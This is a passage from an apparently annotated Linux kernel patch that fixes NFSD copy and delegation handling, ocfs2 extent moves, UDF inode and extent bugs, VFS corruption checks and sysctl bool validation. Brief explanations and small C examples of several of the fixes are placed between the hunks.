+ 		async_copy->cp_src = kmalloc(sizeof(*async_copy->cp_src), GFP_KERNEL);
+ 		if (!async_copy->cp_src)
+ 			goto out_err;
+ 		if (!nfs4_init_copy_state(nn, copy))
+ 			goto out_err;
+-		refcount_set(&async_copy->refcount, 1);
+ 		memcpy(&copy->cp_res.cb_stateid, &copy->cp_stateid.cs_stid,
+ 			sizeof(copy->cp_res.cb_stateid));
+ 		dup_copy_fields(copy, async_copy);
+@@ -1832,18 +1812,22 @@ nfsd4_copy(struct svc_rqst *rqstp, struct nfsd4_compound_state *cstate,
+ 	} else {
+ 		status = nfsd4_do_copy(copy, copy->nf_src->nf_file,
+ 				       copy->nf_dst->nf_file, true);
+-		nfsd4_cleanup_intra_ssc(copy->nf_src, copy->nf_dst);
+ 	}
+ out:
++	release_copy_files(copy);
+ 	return status;
+ out_err:
++	if (nfsd4_ssc_is_inter(copy)) {
++		/*
++		 * Source's vfsmount of inter-copy will be unmounted
++		 * by the laundromat. Use copy instead of async_copy
++		 * since async_copy->ss_nsui might not be set yet.
++		 */
++		refcount_dec(&copy->ss_nsui->nsui_refcnt);
++	}
+ 	if (async_copy)
+ 		cleanup_async_copy(async_copy);
+ 	status = nfserrno(-ENOMEM);
+-	/*
+-	 * source's vfsmount of inter-copy will be unmounted
+-	 * by the laundromat
+-	 */
+ 	goto out;
+ }
+ 
+diff --git a/fs/nfsd/nfs4state.c b/fs/nfsd/nfs4state.c
+index c69f27d3adb79..8852a05126926 100644
+--- a/fs/nfsd/nfs4state.c
++++ b/fs/nfsd/nfs4state.c
+@@ -992,7 +992,6 @@ static int nfs4_init_cp_state(struct nfsd_net *nn, copy_stateid_t *stid,
+ 
+ 	stid->cs_stid.si_opaque.so_clid.cl_boot = (u32)nn->boot_time;
+ 	stid->cs_stid.si_opaque.so_clid.cl_id = nn->s2s_cp_cl_id;
+-	stid->cs_type = cs_type;
+ 
+ 	idr_preload(GFP_KERNEL);
+ 	spin_lock(&nn->s2s_cp_lock);
+@@ -1003,6 +1002,7 @@ static int nfs4_init_cp_state(struct nfsd_net *nn, copy_stateid_t *stid,
+ 	idr_preload_end();
+ 	if (new_id < 0)
+ 		return 0;
++	stid->cs_type = cs_type;
+ 	return 1;
+ }
+ 
+@@ -1036,7 +1036,8 @@ void nfs4_free_copy_state(struct nfsd4_copy *copy)
+ {
+ 	struct nfsd_net *nn;
+ 
+-	WARN_ON_ONCE(copy->cp_stateid.cs_type != NFS4_COPY_STID);
++	if (copy->cp_stateid.cs_type != NFS4_COPY_STID)
++		return;
+ 	nn = net_generic(copy->cp_clp->net, nfsd_net_id);
+ 	spin_lock(&nn->s2s_cp_lock);
+ 	idr_remove(&nn->s2s_cp_stateids,
+@@ -5298,16 +5299,17 @@ nfs4_upgrade_open(struct svc_rqst *rqstp, struct nfs4_file *fp,
+ 	/* test and set deny mode */
+ 	spin_lock(&fp->fi_lock);
+ 	status = nfs4_file_check_deny(fp, open->op_share_deny);
+-	if (status == nfs_ok) {
+-		if (status != nfserr_share_denied) {
+-			set_deny(open->op_share_deny, stp);
+-			fp->fi_share_deny |=
+-				(open->op_share_deny & NFS4_SHARE_DENY_BOTH);
+-		} else {
+-			if (nfs4_resolve_deny_conflicts_locked(fp, false,
+-					stp, open->op_share_deny, false))
+-				status = nfserr_jukebox;
+-		}
++	switch (status) {
++	case nfs_ok:
++		set_deny(open->op_share_deny, stp);
++		fp->fi_share_deny |=
++			(open->op_share_deny & NFS4_SHARE_DENY_BOTH);
++		break;
++	case nfserr_share_denied:
++		if (nfs4_resolve_deny_conflicts_locked(fp, false,
++				stp, open->op_share_deny, false))
++			status = nfserr_jukebox;
++		break;
+ 	}
+ 	spin_unlock(&fp->fi_lock);
+ 
+@@ -5438,6 +5440,23 @@ nfsd4_verify_deleg_dentry(struct nfsd4_open *open, struct nfs4_file *fp,
+ 	return 0;
+ }
+ 
++/*
++ * We avoid breaking delegations held by a client due to its own activity, but
++ * clearing setuid/setgid bits on a write is an implicit activity and the client
++ * may not notice and continue using the old mode. Avoid giving out a delegation
++ * on setuid/setgid files when the client is requesting an open for write.
++ */
++static int
++nfsd4_verify_setuid_write(struct nfsd4_open *open, struct nfsd_file *nf)
++{
++	struct inode *inode = file_inode(nf->nf_file);
++
++	if ((open->op_share_access & NFS4_SHARE_ACCESS_WRITE) &&
++	    (inode->i_mode & (S_ISUID|S_ISGID)))
++		return -EAGAIN;
++	return 0;
++}
++
+ static struct nfs4_delegation *
+ nfs4_set_delegation(struct nfsd4_open *open, struct nfs4_ol_stateid *stp,
+ 		    struct svc_fh *parent)
+@@ -5471,6 +5490,8 @@ nfs4_set_delegation(struct nfsd4_open *open, struct nfs4_ol_stateid *stp,
+ 	spin_lock(&fp->fi_lock);
+ 	if (nfs4_delegation_exists(clp, fp))
+ 		status = -EAGAIN;
++	else if (nfsd4_verify_setuid_write(open, nf))
++		status = -EAGAIN;
+ 	else if (!fp->fi_deleg_file) {
+ 		fp->fi_deleg_file = nf;
+ 		/* increment early to prevent fi_deleg_file from being
+@@ -5511,6 +5532,14 @@ nfs4_set_delegation(struct nfsd4_open *open, struct nfs4_ol_stateid *stp,
+ 	if (status)
+ 		goto out_unlock;
+ 
++	/*
++	 * Now that the deleg is set, check again to ensure that nothing
++	 * raced in and changed the mode while we weren't looking.
++	 */
++	status = nfsd4_verify_setuid_write(open, fp->fi_deleg_file);
++	if (status)
++		goto out_unlock;
++
+ 	spin_lock(&state_lock);
+ 	spin_lock(&fp->fi_lock);
+ 	if (fp->fi_had_conflict)
+diff --git a/fs/nfsd/nfssvc.c b/fs/nfsd/nfssvc.c
+index 325d3d3f12110..a0ecec54d3d7d 100644
+--- a/fs/nfsd/nfssvc.c
++++ b/fs/nfsd/nfssvc.c
+@@ -363,7 +363,7 @@ void nfsd_copy_write_verifier(__be32 verf[2], struct nfsd_net *nn)
+ 
+ 	do {
+ 		read_seqbegin_or_lock(&nn->writeverf_lock, &seq);
+-		memcpy(verf, nn->writeverf, sizeof(*verf));
++		memcpy(verf, nn->writeverf, sizeof(nn->writeverf));
+ 	} while (need_seqretry(&nn->writeverf_lock, seq));
+ 	done_seqretry(&nn->writeverf_lock, seq);
+ }
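The nfssvc.c one-liner is the classic sizeof-on-a-decayed-array bug: verf is declared __be32 verf[2], but as a function parameter it is just a pointer, so sizeof(*verf) is 4 bytes and only half of the 8-byte verifier was copied. Demonstrable in a few lines:

#include <stdio.h>
#include <stdint.h>
#include <string.h>

static uint32_t src[2] = { 0x11111111, 0x22222222 };

static void copy_verifier(uint32_t verf[2])	/* decays to uint32_t * */
{
	uint32_t ok[2] = { 0, 0 }, bad[2] = { 0, 0 };

	memcpy(bad, src, sizeof(*verf));	/* 4 bytes: half the data */
	memcpy(ok, src, sizeof(src));		/* 8 bytes: name the array */
	printf("bad[1]=%x ok[1]=%x\n", (unsigned)bad[1], (unsigned)ok[1]);
}

int main(void)
{
	copy_verifier(src);	/* prints bad[1]=0 ok[1]=22222222 */
	return 0;
}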
+diff --git a/fs/nfsd/trace.h b/fs/nfsd/trace.h
+index 8f9c82d9e075b..4183819ea0829 100644
+--- a/fs/nfsd/trace.h
++++ b/fs/nfsd/trace.h
+@@ -1202,37 +1202,6 @@ TRACE_EVENT(nfsd_file_close,
+ 	)
+ );
+ 
+-TRACE_EVENT(nfsd_file_fsync,
+-	TP_PROTO(
+-		const struct nfsd_file *nf,
+-		int ret
+-	),
+-	TP_ARGS(nf, ret),
+-	TP_STRUCT__entry(
+-		__field(void *, nf_inode)
+-		__field(int, nf_ref)
+-		__field(int, ret)
+-		__field(unsigned long, nf_flags)
+-		__field(unsigned char, nf_may)
+-		__field(struct file *, nf_file)
+-	),
+-	TP_fast_assign(
+-		__entry->nf_inode = nf->nf_inode;
+-		__entry->nf_ref = refcount_read(&nf->nf_ref);
+-		__entry->ret = ret;
+-		__entry->nf_flags = nf->nf_flags;
+-		__entry->nf_may = nf->nf_may;
+-		__entry->nf_file = nf->nf_file;
+-	),
+-	TP_printk("inode=%p ref=%d flags=%s may=%s nf_file=%p ret=%d",
+-		__entry->nf_inode,
+-		__entry->nf_ref,
+-		show_nf_flags(__entry->nf_flags),
+-		show_nfsd_may_flags(__entry->nf_may),
+-		__entry->nf_file, __entry->ret
+-	)
+-);
+-
+ #include "cache.h"
+ 
+ TRACE_DEFINE_ENUM(RC_DROPIT);
+diff --git a/fs/nfsd/xdr4.h b/fs/nfsd/xdr4.h
+index 4fd2cf6d1d2dc..510978e602da6 100644
+--- a/fs/nfsd/xdr4.h
++++ b/fs/nfsd/xdr4.h
+@@ -571,7 +571,7 @@ struct nfsd4_copy {
+ 	struct task_struct	*copy_task;
+ 	refcount_t		refcount;
+ 
+-	struct vfsmount		*ss_mnt;
++	struct nfsd4_ssc_umount_item *ss_nsui;
+ 	struct nfs_fh		c_fh;
+ 	nfs4_stateid		stateid;
+ };
+diff --git a/fs/ocfs2/move_extents.c b/fs/ocfs2/move_extents.c
+index 192cad0662d8b..b1e32ec4a9d41 100644
+--- a/fs/ocfs2/move_extents.c
++++ b/fs/ocfs2/move_extents.c
+@@ -105,14 +105,6 @@ static int __ocfs2_move_extent(handle_t *handle,
+ 	 */
+ 	replace_rec.e_flags = ext_flags & ~OCFS2_EXT_REFCOUNTED;
+ 
+-	ret = ocfs2_journal_access_di(handle, INODE_CACHE(inode),
+-				      context->et.et_root_bh,
+-				      OCFS2_JOURNAL_ACCESS_WRITE);
+-	if (ret) {
+-		mlog_errno(ret);
+-		goto out;
+-	}
+-
+ 	ret = ocfs2_split_extent(handle, &context->et, path, index,
+ 				 &replace_rec, context->meta_ac,
+ 				 &context->dealloc);
+@@ -121,8 +113,6 @@ static int __ocfs2_move_extent(handle_t *handle,
+ 		goto out;
+ 	}
+ 
+-	ocfs2_journal_dirty(handle, context->et.et_root_bh);
+-
+ 	context->new_phys_cpos = new_p_cpos;
+ 
+ 	/*
+@@ -444,7 +434,7 @@ static int ocfs2_find_victim_alloc_group(struct inode *inode,
+ 			bg = (struct ocfs2_group_desc *)gd_bh->b_data;
+ 
+ 			if (vict_blkno < (le64_to_cpu(bg->bg_blkno) +
+-						le16_to_cpu(bg->bg_bits))) {
++						(le16_to_cpu(bg->bg_bits) << bits_per_unit))) {
+ 
+ 				*ret_bh = gd_bh;
+ 				*vict_bit = (vict_blkno - blkno) >>
+@@ -559,6 +549,7 @@ static void ocfs2_probe_alloc_group(struct inode *inode, struct buffer_head *bh,
+ 			last_free_bits++;
+ 
+ 		if (last_free_bits == move_len) {
++			i -= move_len;
+ 			*goal_bit = i;
+ 			*phys_cpos = base_cpos + i;
+ 			break;
+@@ -1030,18 +1021,19 @@ int ocfs2_ioctl_move_extents(struct file *filp, void __user *argp)
+ 
+ 	context->range = &range;
+ 
++	/*
++	 * ok, the default theshold for the defragmentation
++	 * is 1M, since our maximum clustersize was 1M also.
++	 * any thought?
++	 */
++	if (!range.me_threshold)
++		range.me_threshold = 1024 * 1024;
++
++	if (range.me_threshold > i_size_read(inode))
++		range.me_threshold = i_size_read(inode);
++
+ 	if (range.me_flags & OCFS2_MOVE_EXT_FL_AUTO_DEFRAG) {
+ 		context->auto_defrag = 1;
+-		/*
+-		 * ok, the default theshold for the defragmentation
+-		 * is 1M, since our maximum clustersize was 1M also.
+-		 * any thought?
+-		 */
+-		if (!range.me_threshold)
+-			range.me_threshold = 1024 * 1024;
+-
+-		if (range.me_threshold > i_size_read(inode))
+-			range.me_threshold = i_size_read(inode);
+ 
+ 		if (range.me_flags & OCFS2_MOVE_EXT_FL_PART_DEFRAG)
+ 			context->partial = 1;
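Two distinct fixes above: the victim-group range check must convert bg_bits (allocation units) into disk blocks with << bits_per_unit before comparing against vict_blkno, and the goal-bit scan must rewind i by move_len because the loop exits one position past the free run it found. The unit-conversion guard, sketched with illustrative names:

#include <stdbool.h>
#include <stdint.h>

/* One allocation unit covers (1 << bits_per_unit) disk blocks.
 * Comparing a block number against a raw count of units makes the
 * window look (1 << bits_per_unit) times too small, so valid
 * victims fall outside every group. */
static bool blkno_in_group(uint64_t blkno, uint64_t group_start,
			   uint16_t group_bits, unsigned bits_per_unit)
{
	uint64_t group_blocks = (uint64_t)group_bits << bits_per_unit;

	return blkno >= group_start && blkno < group_start + group_blocks;
}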
+diff --git a/fs/open.c b/fs/open.c
+index 82c1a28b33089..ceb88ac0ca3b2 100644
+--- a/fs/open.c
++++ b/fs/open.c
+@@ -1411,8 +1411,9 @@ int filp_close(struct file *filp, fl_owner_t id)
+ {
+ 	int retval = 0;
+ 
+-	if (!file_count(filp)) {
+-		printk(KERN_ERR "VFS: Close: file count is 0\n");
++	if (CHECK_DATA_CORRUPTION(file_count(filp) == 0,
++			"VFS: Close: file count is 0 (f_op=%ps)",
++			filp->f_op)) {
+ 		return 0;
+ 	}
+ 
+diff --git a/fs/proc/proc_sysctl.c b/fs/proc/proc_sysctl.c
+index 48f2d60bd78a2..436025e0f77a6 100644
+--- a/fs/proc/proc_sysctl.c
++++ b/fs/proc/proc_sysctl.c
+@@ -1124,6 +1124,11 @@ static int sysctl_check_table_array(const char *path, struct ctl_table *table)
+ 			err |= sysctl_err(path, table, "array not allowed");
+ 	}
+ 
++	if (table->proc_handler == proc_dobool) {
++		if (table->maxlen != sizeof(bool))
++			err |= sysctl_err(path, table, "array not allowed");
++	}
++
+ 	return err;
+ }
+ 
+@@ -1136,6 +1141,7 @@ static int sysctl_check_table(const char *path, struct ctl_table *table)
+ 			err |= sysctl_err(path, entry, "Not a file");
+ 
+ 		if ((entry->proc_handler == proc_dostring) ||
++		    (entry->proc_handler == proc_dobool) ||
+ 		    (entry->proc_handler == proc_dointvec) ||
+ 		    (entry->proc_handler == proc_douintvec) ||
+ 		    (entry->proc_handler == proc_douintvec_minmax) ||
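This hunk pairs with the lockd change earlier in the patch: proc_dobool transfers exactly one bool, so nsm_use_hostnames must declare maxlen = sizeof(bool) (1 byte on common ABIs, not sizeof(int)), and sysctl_check_table_array() now rejects proc_dobool entries of any other size. A correct entry, modeled directly on the nsm_use_hostnames fix (the knob itself is hypothetical):

static bool my_feature_enabled;

static struct ctl_table my_sysctls[] = {
	{
		.procname	= "my_feature_enabled",
		.data		= &my_feature_enabled,
		.maxlen		= sizeof(bool),	/* not sizeof(int) */
		.mode		= 0644,
		.proc_handler	= proc_dobool,
	},
	{ }
};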
+diff --git a/fs/super.c b/fs/super.c
+index 12c08cb20405d..cf737ec2bd05c 100644
+--- a/fs/super.c
++++ b/fs/super.c
+@@ -491,10 +491,23 @@ void generic_shutdown_super(struct super_block *sb)
+ 		if (sop->put_super)
+ 			sop->put_super(sb);
+ 
+-		if (!list_empty(&sb->s_inodes)) {
+-			printk("VFS: Busy inodes after unmount of %s. "
+-			   "Self-destruct in 5 seconds.  Have a nice day...\n",
+-			   sb->s_id);
++		if (CHECK_DATA_CORRUPTION(!list_empty(&sb->s_inodes),
++				"VFS: Busy inodes after unmount of %s (%s)",
++				sb->s_id, sb->s_type->name)) {
++			/*
++			 * Adding a proper bailout path here would be hard, but
++			 * we can at least make it more likely that a later
++			 * iput_final() or such crashes cleanly.
++			 */
++			struct inode *inode;
++
++			spin_lock(&sb->s_inode_list_lock);
++			list_for_each_entry(inode, &sb->s_inodes, i_sb_list) {
++				inode->i_op = VFS_PTR_POISON;
++				inode->i_sb = VFS_PTR_POISON;
++				inode->i_mapping = VFS_PTR_POISON;
++			}
++			spin_unlock(&sb->s_inode_list_lock);
+ 		}
+ 	}
+ 	spin_lock(&sb_lock);
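Rather than only logging busy inodes after unmount, generic_shutdown_super() now poisons their i_op/i_sb/i_mapping with VFS_PTR_POISON, so a later use-after-free faults at a recognizable unmapped address instead of silently chasing stale pointers. The idea in miniature (the poison value mirrors the new define, everything else is illustrative):

#include <stdio.h>

#define PTR_POISON ((void *)0xF5)	/* small, unmapped, recognizable */

struct obj { void *ops; };

/* After teardown, any survivor that is still reachable gets its
 * pointers poisoned: a later dereference faults immediately at an
 * address that stands out in the crash dump, instead of wandering
 * through freed memory. */
static void poison_survivor(struct obj *o)
{
	o->ops = PTR_POISON;
}

int main(void)
{
	struct obj o = { &o };

	poison_survivor(&o);
	printf("ops now %p\n", o.ops);	/* 0xf5: never dereference */
	return 0;
}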
+diff --git a/fs/udf/file.c b/fs/udf/file.c
+index 5c659e23e578f..8be51161f3e52 100644
+--- a/fs/udf/file.c
++++ b/fs/udf/file.c
+@@ -149,26 +149,24 @@ static ssize_t udf_file_write_iter(struct kiocb *iocb, struct iov_iter *from)
+ 		goto out;
+ 
+ 	down_write(&iinfo->i_data_sem);
+-	if (iinfo->i_alloc_type == ICBTAG_FLAG_AD_IN_ICB) {
+-		loff_t end = iocb->ki_pos + iov_iter_count(from);
+-
+-		if (inode->i_sb->s_blocksize <
+-				(udf_file_entry_alloc_offset(inode) + end)) {
+-			err = udf_expand_file_adinicb(inode);
+-			if (err) {
+-				inode_unlock(inode);
+-				udf_debug("udf_expand_adinicb: err=%d\n", err);
+-				return err;
+-			}
+-		} else {
+-			iinfo->i_lenAlloc = max(end, inode->i_size);
+-			up_write(&iinfo->i_data_sem);
++	if (iinfo->i_alloc_type == ICBTAG_FLAG_AD_IN_ICB &&
++	    inode->i_sb->s_blocksize < (udf_file_entry_alloc_offset(inode) +
++				 iocb->ki_pos + iov_iter_count(from))) {
++		err = udf_expand_file_adinicb(inode);
++		if (err) {
++			inode_unlock(inode);
++			udf_debug("udf_expand_adinicb: err=%d\n", err);
++			return err;
+ 		}
+ 	} else
+ 		up_write(&iinfo->i_data_sem);
+ 
+ 	retval = __generic_file_write_iter(iocb, from);
+ out:
++	down_write(&iinfo->i_data_sem);
++	if (iinfo->i_alloc_type == ICBTAG_FLAG_AD_IN_ICB && retval > 0)
++		iinfo->i_lenAlloc = inode->i_size;
++	up_write(&iinfo->i_data_sem);
+ 	inode_unlock(inode);
+ 
+ 	if (retval > 0) {
+diff --git a/fs/udf/inode.c b/fs/udf/inode.c
+index 34e416327dd4e..a1af2c2e1c295 100644
+--- a/fs/udf/inode.c
++++ b/fs/udf/inode.c
+@@ -521,8 +521,10 @@ static int udf_do_extend_file(struct inode *inode,
+ 	}
+ 
+ 	if (fake) {
+-		udf_add_aext(inode, last_pos, &last_ext->extLocation,
+-			     last_ext->extLength, 1);
++		err = udf_add_aext(inode, last_pos, &last_ext->extLocation,
++				   last_ext->extLength, 1);
++		if (err < 0)
++			goto out_err;
+ 		count++;
+ 	} else {
+ 		struct kernel_lb_addr tmploc;
+@@ -556,7 +558,7 @@ static int udf_do_extend_file(struct inode *inode,
+ 		err = udf_add_aext(inode, last_pos, &last_ext->extLocation,
+ 				   last_ext->extLength, 1);
+ 		if (err)
+-			return err;
++			goto out_err;
+ 		count++;
+ 	}
+ 	if (new_block_bytes) {
+@@ -565,7 +567,7 @@ static int udf_do_extend_file(struct inode *inode,
+ 		err = udf_add_aext(inode, last_pos, &last_ext->extLocation,
+ 				   last_ext->extLength, 1);
+ 		if (err)
+-			return err;
++			goto out_err;
+ 		count++;
+ 	}
+ 
+@@ -579,6 +581,11 @@ out:
+ 		return -EIO;
+ 
+ 	return count;
++out_err:
++	/* Remove extents we've created so far */
++	udf_clear_extent_cache(inode);
++	udf_truncate_extents(inode);
++	return err;
+ }
+ 
+ /* Extend the final block of the file to final_block_len bytes */
+@@ -792,19 +799,17 @@ static sector_t inode_getblk(struct inode *inode, sector_t block,
+ 		c = 0;
+ 		offset = 0;
+ 		count += ret;
+-		/* We are not covered by a preallocated extent? */
+-		if ((laarr[0].extLength & UDF_EXTENT_FLAG_MASK) !=
+-						EXT_NOT_RECORDED_ALLOCATED) {
+-			/* Is there any real extent? - otherwise we overwrite
+-			 * the fake one... */
+-			if (count)
+-				c = !c;
+-			laarr[c].extLength = EXT_NOT_RECORDED_NOT_ALLOCATED |
+-				inode->i_sb->s_blocksize;
+-			memset(&laarr[c].extLocation, 0x00,
+-				sizeof(struct kernel_lb_addr));
+-			count++;
+-		}
++		/*
++		 * Is there any real extent? - otherwise we overwrite the fake
++		 * one...
++		 */
++		if (count)
++			c = !c;
++		laarr[c].extLength = EXT_NOT_RECORDED_NOT_ALLOCATED |
++			inode->i_sb->s_blocksize;
++		memset(&laarr[c].extLocation, 0x00,
++			sizeof(struct kernel_lb_addr));
++		count++;
+ 		endnum = c + 1;
+ 		lastblock = 1;
+ 	} else {
+@@ -1080,23 +1085,8 @@ static void udf_merge_extents(struct inode *inode, struct kernel_long_ad *laarr,
+ 			blocksize - 1) >> blocksize_bits)))) {
+ 
+ 			if (((li->extLength & UDF_EXTENT_LENGTH_MASK) +
+-				(lip1->extLength & UDF_EXTENT_LENGTH_MASK) +
+-				blocksize - 1) & ~UDF_EXTENT_LENGTH_MASK) {
+-				lip1->extLength = (lip1->extLength -
+-						  (li->extLength &
+-						   UDF_EXTENT_LENGTH_MASK) +
+-						   UDF_EXTENT_LENGTH_MASK) &
+-							~(blocksize - 1);
+-				li->extLength = (li->extLength &
+-						 UDF_EXTENT_FLAG_MASK) +
+-						(UDF_EXTENT_LENGTH_MASK + 1) -
+-						blocksize;
+-				lip1->extLocation.logicalBlockNum =
+-					li->extLocation.logicalBlockNum +
+-					((li->extLength &
+-						UDF_EXTENT_LENGTH_MASK) >>
+-						blocksize_bits);
+-			} else {
++			     (lip1->extLength & UDF_EXTENT_LENGTH_MASK) +
++			     blocksize - 1) <= UDF_EXTENT_LENGTH_MASK) {
+ 				li->extLength = lip1->extLength +
+ 					(((li->extLength &
+ 						UDF_EXTENT_LENGTH_MASK) +
+@@ -1381,6 +1371,7 @@ reread:
+ 		ret = -EIO;
+ 		goto out;
+ 	}
++	iinfo->i_hidden = hidden_inode;
+ 	iinfo->i_unique = 0;
+ 	iinfo->i_lenEAttr = 0;
+ 	iinfo->i_lenExtents = 0;
+@@ -1716,8 +1707,12 @@ static int udf_update_inode(struct inode *inode, int do_sync)
+ 
+ 	if (S_ISDIR(inode->i_mode) && inode->i_nlink > 0)
+ 		fe->fileLinkCount = cpu_to_le16(inode->i_nlink - 1);
+-	else
+-		fe->fileLinkCount = cpu_to_le16(inode->i_nlink);
++	else {
++		if (iinfo->i_hidden)
++			fe->fileLinkCount = cpu_to_le16(0);
++		else
++			fe->fileLinkCount = cpu_to_le16(inode->i_nlink);
++	}
+ 
+ 	fe->informationLength = cpu_to_le64(inode->i_size);
+ 
+@@ -1888,8 +1883,13 @@ struct inode *__udf_iget(struct super_block *sb, struct kernel_lb_addr *ino,
+ 	if (!inode)
+ 		return ERR_PTR(-ENOMEM);
+ 
+-	if (!(inode->i_state & I_NEW))
++	if (!(inode->i_state & I_NEW)) {
++		if (UDF_I(inode)->i_hidden != hidden_inode) {
++			iput(inode);
++			return ERR_PTR(-EFSCORRUPTED);
++		}
+ 		return inode;
++	}
+ 
+ 	memcpy(&UDF_I(inode)->i_location, ino, sizeof(struct kernel_lb_addr));
+ 	err = udf_read_inode(inode, hidden_inode);
+diff --git a/fs/udf/super.c b/fs/udf/super.c
+index 06eda8177b5f1..241b40e886b36 100644
+--- a/fs/udf/super.c
++++ b/fs/udf/super.c
+@@ -147,6 +147,7 @@ static struct inode *udf_alloc_inode(struct super_block *sb)
+ 	ei->i_next_alloc_goal = 0;
+ 	ei->i_strat4096 = 0;
+ 	ei->i_streamdir = 0;
++	ei->i_hidden = 0;
+ 	init_rwsem(&ei->i_data_sem);
+ 	ei->cached_extent.lstart = -1;
+ 	spin_lock_init(&ei->i_extent_cache_lock);
+diff --git a/fs/udf/udf_i.h b/fs/udf/udf_i.h
+index 06ff7006b8227..312b7c9ef10e2 100644
+--- a/fs/udf/udf_i.h
++++ b/fs/udf/udf_i.h
+@@ -44,7 +44,8 @@ struct udf_inode_info {
+ 	unsigned		i_use : 1;	/* unallocSpaceEntry */
+ 	unsigned		i_strat4096 : 1;
+ 	unsigned		i_streamdir : 1;
+-	unsigned		reserved : 25;
++	unsigned		i_hidden : 1;	/* hidden system inode */
++	unsigned		reserved : 24;
+ 	__u8			*i_data;
+ 	struct kernel_lb_addr	i_locStreamdir;
+ 	__u64			i_lenStreams;
+diff --git a/fs/udf/udf_sb.h b/fs/udf/udf_sb.h
+index 291b56dd011ee..6bccff3c70f54 100644
+--- a/fs/udf/udf_sb.h
++++ b/fs/udf/udf_sb.h
+@@ -55,6 +55,8 @@
+ #define MF_DUPLICATE_MD		0x01
+ #define MF_MIRROR_FE_LOADED	0x02
+ 
++#define EFSCORRUPTED EUCLEAN
++
+ struct udf_meta_data {
+ 	__u32	s_meta_file_loc;
+ 	__u32	s_mirror_file_loc;
+diff --git a/include/drm/drm_mipi_dsi.h b/include/drm/drm_mipi_dsi.h
+index 20b21b577deaa..9054a5185e1a9 100644
+--- a/include/drm/drm_mipi_dsi.h
++++ b/include/drm/drm_mipi_dsi.h
+@@ -296,6 +296,10 @@ int mipi_dsi_dcs_set_display_brightness(struct mipi_dsi_device *dsi,
+ 					u16 brightness);
+ int mipi_dsi_dcs_get_display_brightness(struct mipi_dsi_device *dsi,
+ 					u16 *brightness);
++int mipi_dsi_dcs_set_display_brightness_large(struct mipi_dsi_device *dsi,
++					     u16 brightness);
++int mipi_dsi_dcs_get_display_brightness_large(struct mipi_dsi_device *dsi,
++					     u16 *brightness);
+ 
+ /**
+  * mipi_dsi_dcs_write_seq - transmit a DCS command with payload
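The two *_large prototypes cover panels whose brightness register is wider than 8 bits; the byte packing itself lives in the drm_mipi_dsi.c side, which is not part of this hunk. A hedged sketch of packing a 16-bit brightness into a two-byte DCS 0x51 payload follows -- MSB-first order is an assumption of this sketch, and the kernel helper owns whatever order the spec actually mandates:

#include <stdint.h>
#include <stddef.h>
#include <stdio.h>

#define DCS_SET_DISPLAY_BRIGHTNESS 0x51	/* standard DCS opcode */

/* Stub transport standing in for the real DSI host write. */
static int dcs_write(uint8_t cmd, const uint8_t *payload, size_t len)
{
	printf("cmd %02x len %zu: %02x %02x\n",
	       cmd, len, payload[0], payload[1]);
	return 0;
}

static int set_brightness_large(uint16_t brightness)
{
	/* MSB-first packing assumed here. */
	uint8_t payload[2] = { brightness >> 8, brightness & 0xff };

	return dcs_write(DCS_SET_DISPLAY_BRIGHTNESS, payload,
			 sizeof(payload));
}

int main(void)
{
	return set_brightness_large(0x01ff);
}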
+diff --git a/include/drm/drm_print.h b/include/drm/drm_print.h
+index a44fb7ef257f6..094ded23534c7 100644
+--- a/include/drm/drm_print.h
++++ b/include/drm/drm_print.h
+@@ -521,7 +521,7 @@ __printf(1, 2)
+ void __drm_err(const char *format, ...);
+ 
+ #if !defined(CONFIG_DRM_USE_DYNAMIC_DEBUG)
+-#define __drm_dbg(fmt, ...)		___drm_dbg(NULL, fmt, ##__VA_ARGS__)
++#define __drm_dbg(cat, fmt, ...)		___drm_dbg(NULL, cat, fmt, ##__VA_ARGS__)
+ #else
+ #define __drm_dbg(cat, fmt, ...)					\
+ 	_dynamic_func_call_cls(cat, fmt, ___drm_dbg,			\
+diff --git a/include/linux/blkdev.h b/include/linux/blkdev.h
+index 43d4e073b1115..10ee92db680c9 100644
+--- a/include/linux/blkdev.h
++++ b/include/linux/blkdev.h
+@@ -484,6 +484,7 @@ struct request_queue {
+ 	DECLARE_BITMAP		(blkcg_pols, BLKCG_MAX_POLS);
+ 	struct blkcg_gq		*root_blkg;
+ 	struct list_head	blkg_list;
++	struct mutex		blkcg_mutex;
+ #endif
+ 
+ 	struct queue_limits	limits;
+diff --git a/include/linux/bpf.h b/include/linux/bpf.h
+index 634d37a599fa7..cf0d88109e3f9 100644
+--- a/include/linux/bpf.h
++++ b/include/linux/bpf.h
+@@ -346,6 +346,13 @@ static inline void bpf_obj_init(const struct btf_field_offs *foffs, void *obj)
+ 		memset(obj + foffs->field_off[i], 0, foffs->field_sz[i]);
+ }
+ 
++/* 'dst' must be a temporary buffer and should not point to memory that is being
++ * used in parallel by a bpf program or bpf syscall, otherwise the access from
++ * the bpf program or bpf syscall may be corrupted by the reinitialization,
++ * leading to weird problems. Even if 'dst' is newly allocated from the
++ * bpf memory allocator, it is still possible for 'dst' to be used in
++ * parallel by a bpf program or bpf syscall.
++ */
+ static inline void check_and_init_map_value(struct bpf_map *map, void *dst)
+ {
+ 	bpf_obj_init(map->field_offs, dst);
+diff --git a/include/linux/compiler_attributes.h b/include/linux/compiler_attributes.h
+index 898b3458b24a0..b83126452c651 100644
+--- a/include/linux/compiler_attributes.h
++++ b/include/linux/compiler_attributes.h
+@@ -75,12 +75,6 @@
+ # define __assume_aligned(a, ...)
+ #endif
+ 
+-/*
+- *   gcc: https://gcc.gnu.org/onlinedocs/gcc/Common-Function-Attributes.html#index-cold-function-attribute
+- *   gcc: https://gcc.gnu.org/onlinedocs/gcc/Label-Attributes.html#index-cold-label-attribute
+- */
+-#define __cold                          __attribute__((__cold__))
+-
+ /*
+  * Note the long name.
+  *
+diff --git a/include/linux/compiler_types.h b/include/linux/compiler_types.h
+index 7c1afe0f4129c..aab34e30128e9 100644
+--- a/include/linux/compiler_types.h
++++ b/include/linux/compiler_types.h
+@@ -79,6 +79,33 @@ static inline void __chk_io_ptr(const volatile void __iomem *ptr) { }
+ /* Attributes */
+ #include <linux/compiler_attributes.h>
+ 
++#if CONFIG_FUNCTION_ALIGNMENT > 0
++#define __function_aligned		__aligned(CONFIG_FUNCTION_ALIGNMENT)
++#else
++#define __function_aligned
++#endif
++
++/*
++ *   gcc: https://gcc.gnu.org/onlinedocs/gcc/Common-Function-Attributes.html#index-cold-function-attribute
++ *   gcc: https://gcc.gnu.org/onlinedocs/gcc/Label-Attributes.html#index-cold-label-attribute
++ *
++ * When -falign-functions=N is in use, we must avoid the cold attribute as
++ * contemporary versions of GCC drop the alignment for cold functions. Worse,
++ * GCC can implicitly mark callees of cold functions as cold themselves, so
